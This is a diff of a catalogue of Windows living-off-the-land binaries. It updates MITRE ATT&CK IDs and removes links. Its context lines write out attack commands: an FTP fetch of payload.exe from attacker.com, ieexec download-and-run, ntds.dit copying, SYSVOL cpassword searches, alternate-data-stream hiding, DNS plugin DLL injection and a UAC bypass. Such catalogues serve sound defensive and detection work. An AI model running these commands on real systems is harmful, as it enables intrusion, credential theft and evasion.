Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
|
OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
|
||||||
- Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
|
- Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
|
||||||
Description: Download and compress a remote file and store it in a cab file on local machine.
|
Description: Download and compress a remote file and store it in a cab file on local machine.
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
||||||
OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019
|
OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\diantz.exe
|
- Path: c:\windows\system32\diantz.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Dump
|
Category: Dump
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows server
|
OperatingSystem: Windows server
|
||||||
- Command: diskshadow> exec calc.exe
|
- Command: diskshadow> exec calc.exe
|
||||||
Description: Execute commands using diskshadow.exe to spawn child process
|
Description: Execute commands using diskshadow.exe to spawn child process
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1003
|
MitreID: T1003
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
|
|
||||||
OperatingSystem: Windows server
|
OperatingSystem: Windows server
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\diskshadow.exe
|
- Path: C:\Windows\System32\diskshadow.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1546.015
|
MitreID: T1546.015
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1546/015/
|
|
||||||
OperatingSystem: Windows 10 (and likely previous versions)
|
OperatingSystem: Windows 10 (and likely previous versions)
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\dllhost.exe
|
- Path: C:\Windows\System32\dllhost.exe
|
||||||
|
@ -6,11 +6,10 @@ Created: 2018-05-25
|
|||||||
Commands:
|
Commands:
|
||||||
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
|
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
|
||||||
Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
|
Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
|
||||||
Usecase: Remotly inject dll to dns server
|
Usecase: Remotely inject dll to dns server
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: DNS admin
|
Privileges: DNS admin
|
||||||
MitreID: T1035
|
MitreID: T1543.003
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1035
|
|
||||||
OperatingSystem: Windows server
|
OperatingSystem: Windows server
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Dnscmd.exe
|
- Path: C:\Windows\System32\Dnscmd.exe
|
||||||
|
@ -10,39 +10,34 @@ Commands:
|
|||||||
Category: Copy
|
Category: Copy
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
|
- Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
|
||||||
Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
|
Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
|
||||||
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
|
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
|
- Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
|
||||||
Description: Copies the source Alternate Data Stream (ADS) to the destination EXE.
|
Description: Copies the source Alternate Data Stream (ADS) to the destination EXE.
|
||||||
Usecase: Extract hidden file within alternate data streams
|
Usecase: Extract hidden file within alternate data streams
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
|
- Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
|
||||||
Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
|
Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
|
||||||
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
|
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
|
- Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
|
||||||
Description: Copies the source EXE to the destination EXE file
|
Description: Copies the source EXE to the destination EXE file
|
||||||
Usecase: Use to copy files from one unc path to another
|
Usecase: Use to copy files from one unc path to another
|
||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
|
- Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
|
||||||
Description: Copies a (locked) file using Volume Shadow Copy
|
Description: Copies a (locked) file using Volume Shadow Copy
|
||||||
@ -50,7 +45,6 @@ Commands:
|
|||||||
Category: Copy
|
Category: Copy
|
||||||
Privileges: Admin
|
Privileges: Admin
|
||||||
MitreID: T1003
|
MitreID: T1003
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1003/
|
|
||||||
OperatingSystem: Windows 10, Windows 2016 Server, Windows 2019 Server
|
OperatingSystem: Windows 10, Windows 2016 Server, Windows 2019 Server
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\esentutl.exe
|
- Path: C:\Windows\System32\esentutl.exe
|
||||||
|
@ -9,8 +9,7 @@ Commands:
|
|||||||
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
|
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
|
||||||
Category: UAC bypass
|
Category: UAC bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1088
|
MitreID: T1548.002
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1088
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\eventvwr.exe
|
- Path: C:\Windows\System32\eventvwr.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: expand c:\ADS\file1.bat c:\ADS\file2.bat
|
- Command: expand c:\ADS\file1.bat c:\ADS\file2.bat
|
||||||
Description: Copies source file to destination.
|
Description: Copies source file to destination.
|
||||||
@ -18,15 +17,13 @@ Commands:
|
|||||||
Category: Copy
|
Category: Copy
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
|
- Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
|
||||||
Description: Copies source file to destination Alternate Data Stream (ADS)
|
Description: Copies source file to destination Alternate Data Stream (ADS)
|
||||||
Usecase: Copies files from A to B
|
Usecase: Copies files from A to B
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Expand.exe
|
- Path: C:\Windows\System32\Expand.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: explorer.exe C:\Windows\System32\notepad.exe
|
- Command: explorer.exe C:\Windows\System32\notepad.exe
|
||||||
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
|
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows 10 (Tested)
|
OperatingSystem: Windows 10 (Tested)
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\explorer.exe
|
- Path: C:\Windows\explorer.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Program Files\Internet Explorer\Extexport.exe
|
- Path: C:\Program Files\Internet Explorer\Extexport.exe
|
||||||
|
@ -9,16 +9,14 @@ Commands:
|
|||||||
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
|
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
|
||||||
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
|
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
|
||||||
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
|
- Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
|
||||||
Description: Copy the source file to the destination file and overwrite it.
|
Description: Copy the source file to the destination file and overwrite it.
|
||||||
@ -26,7 +24,6 @@ Commands:
|
|||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe
|
- Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe
|
||||||
Description: Command for copying calc.exe to another folder
|
Description: Command for copying calc.exe to another folder
|
||||||
@ -34,7 +31,6 @@ Commands:
|
|||||||
Category: Copy
|
Category: Copy
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\extrac32.exe
|
- Path: C:\Windows\System32\extrac32.exe
|
||||||
|
@ -9,24 +9,21 @@ Commands:
|
|||||||
Usecase: Add a file to an alternate data stream to hide from defensive counter measures
|
Usecase: Add a file to an alternate data stream to hide from defensive counter measures
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
|
- Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
|
||||||
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
||||||
Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
|
Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: findstr /S /I cpassword \\sysvol\policies\*.xml
|
- Command: findstr /S /I cpassword \\sysvol\policies\*.xml
|
||||||
Description: Search for stored password in Group Policy files stored on SYSVOL.
|
Description: Search for stored password in Group Policy files stored on SYSVOL.
|
||||||
Usecase: Find credentials stored in cpassword attrbute
|
Usecase: Find credentials stored in cpassword attrbute
|
||||||
Category: Credentials
|
Category: Credentials
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1081
|
MitreID: T1552.001
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1081
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
|
- Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
|
||||||
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is downloaded to the target file.
|
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is downloaded to the target file.
|
||||||
@ -34,7 +31,6 @@ Commands:
|
|||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1185
|
MitreID: T1185
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1185
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\findstr.exe
|
- Path: C:\Windows\System32\findstr.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1105
|
|
||||||
OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
|
OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\finger.exe
|
- Path: c:\windows\system32\finger.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: Admin
|
Privileges: Admin
|
||||||
MitreID: T1562
|
MitreID: T1562
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1562/002/
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\fltMC.exe
|
- Path: C:\Windows\System32\fltMC.exe
|
||||||
|
@ -10,15 +10,13 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
|
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
|
||||||
Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
|
Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
|
||||||
Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
|
Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\forfiles.exe
|
- Path: C:\Windows\System32\forfiles.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
|
- Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
|
||||||
Description: Download
|
Description: Download
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
||||||
OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\ftp.exe
|
- Path: C:\Windows\System32\ftp.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1105/
|
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\
|
- Path: c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: Administrator
|
Privileges: Administrator
|
||||||
MitreID: T1216
|
MitreID: T1216
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: Gpscript /startup
|
- Command: Gpscript /startup
|
||||||
Description: Executes startup scripts configured in Group Policy
|
Description: Executes startup scripts configured in Group Policy
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: Administrator
|
Privileges: Administrator
|
||||||
MitreID: T1216
|
MitreID: T1216
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\gpscript.exe
|
- Path: C:\Windows\System32\gpscript.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: HH.exe c:\windows\system32\calc.exe
|
- Command: HH.exe c:\windows\system32\calc.exe
|
||||||
Description: Executes calc.exe with HTML Help.
|
Description: Executes calc.exe with HTML Help.
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1216
|
MitreID: T1216
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\hh.exe
|
- Path: C:\Windows\System32\hh.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
|
- Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\ie4uinit.exe
|
- Path: c:\windows\system32\ie4uinit.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||||
Description: Downloads and executes bypass.exe from the remote server.
|
Description: Downloads and executes bypass.exe from the remote server.
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
